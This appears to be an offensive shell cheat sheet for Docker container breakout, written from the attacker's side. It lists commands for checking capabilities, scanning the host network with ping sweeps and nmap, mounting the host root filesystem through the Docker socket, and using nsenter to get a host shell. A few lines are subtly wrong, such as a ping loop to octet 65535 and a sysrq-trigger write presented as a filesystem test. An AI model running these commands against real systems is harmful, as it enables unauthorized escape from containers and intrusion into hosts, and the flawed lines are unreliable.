# are we inside a container?
ls -l /.dockerenv
cat /proc/1/cgroup | grep docker
# check if privileged - you must see host devices
fdisk -l
# check if privileged (looks like these should be seen
# under `Current:` and not on the bounding set)
# - if Capeff is set to all 0's, the container most likely
# doesn't have much permissions, meaning you can't breakout!
capsh --print | egrep 'cap_(net_admin|sys_module|sys_chroot|sys_admin|sys_time)'
# Use this if `capsh` is not available
# - on attacker machine, get one output and decode it:
# capsh --decode=<NUMBERS>
# NOTE: Look at CapPrm and CapEff output
cat /proc/$$/status | grep ^Cap
# Extracting network information
cat /proc/net/tcp
hostname -I
ifconfig
ip a
# Check the available IPs via arp. For example, you can find
# IP addresses of databases using these methods below.
ip neighbor
arp -a
cat /etc/hosts
# Check subnets
cat /proc/net/fib_trie | grep -B1 "32 host LOCAL"
# You can also do ping sweep to see reachable IPs.
for i in {1..254}; do (ping -c 1 172.17.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
for i in {1..65535}; do ping -c 1 172.20.0.${i} &> /dev/null && echo "$i: UP"; done
# check if can control docker socket
ls -l /var/run/docker.sock
# check if you can write to the filesystem
echo 1 > /proc/sysrq-trigger
# try to mount host root volume
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# docker running with --pid=host command? processes
# must be similar to host processes
ps -ef
# use a statically compiled nmap and upload
# /usr/share/nmap inside the container
./nmap --datadir usr/share/nmap -sT -p1-65535 172.20.0.1-10
# enter root namespace and drop to host shell
nsenter --target 1 --mount sh
# create a new namespace mapping root user
unshare -r
# see if you can migrate to another namespace (root namespace?)
nsenter --target 1 --all
# check hardcoded IPs and hostnames
cat /etc/hosts
# check what devices are available and mounted
mount
cat /proc/mounts